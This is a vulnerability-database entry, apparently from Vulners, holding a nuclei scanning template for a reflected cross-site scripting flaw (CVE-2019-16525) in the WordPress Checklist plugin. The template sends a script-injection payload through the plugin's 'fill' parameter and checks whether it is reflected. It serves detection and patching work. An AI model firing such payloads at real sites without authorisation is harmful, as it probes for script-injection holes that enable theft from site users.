Lucene search
+L

WordPress Checklist <1.1.9 - Cross-Site Scripting

🗓️ 16 Aug 2026 19:27:40Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 52 Views

WordPress Checklist <1.1.9 - Cross-Site Scripting vulnerability allows injection of malicious scripts leading to potential data theft or unauthorized actions. Update to version 1.1.9 or higher

Related
Refs
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2019-16525
19 Sep 201919:02
cve
cvelist
Cvelist
CVE-2019-16525
19 Sep 201919:02
cvelist
euvd
EUVD
EUVD-2019-7202
7 Oct 202500:30
euvd
nvd
NVD
CVE-2019-16525
19 Sep 201920:15
nvd
osv
OSV
CVE-2019-16525
19 Sep 201920:15
osv
prion
Prion
Cross site scripting
19 Sep 201920:15
prion
redhatcve
RedhatCVE
CVE-2019-16525
22 May 202508:16
redhatcve
wpexploit
wpexploit
Checklist <= 1.1.5 - Unauthenticated Reflected XSS
10 Sep 201900:00
wpexploit
wpvulndb
WPVulnDB
Checklist <= 1.1.5 - Unauthenticated Reflected XSS
10 Sep 201900:00
wpvulndb
id: CVE-2019-16525

info:
  name: WordPress Checklist <1.1.9 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
  impact: |
    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update to the latest version of the WordPress Checklist plugin (1.1.9 or higher) to mitigate this vulnerability.
  reference:
    - https://wordpress.org/plugins/checklist/#developers
    - https://packetstormsecurity.com/files/154436/WordPress-Checklist-1.1.5-Cross-Site-Scripting.html
    - https://plugins.trac.wordpress.org/changeset/2155029/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16525
    - https://wpvulndb.com/vulnerabilities/9877
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-16525
    cwe-id: CWE-79
    epss-score: 0.05524
    epss-percentile: 0.92124
    cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: checklist
    product: checklist
    framework: wordpress
  tags: cve,cve2019,xss,wp-plugin,packetstorm,wordpress,checklist,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/checklist/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Checklist'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205eeb792f6b6faa3089a5a437ef8c2e83a09795729a1c07bac53677eb0be6de160221008cd0891ee571dd9c53123ee9aea7d1fc0ea70cdf98b8784b31a68c9a11869e2f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 24.3
CVSS 3.16.1
EPSS0.05524
52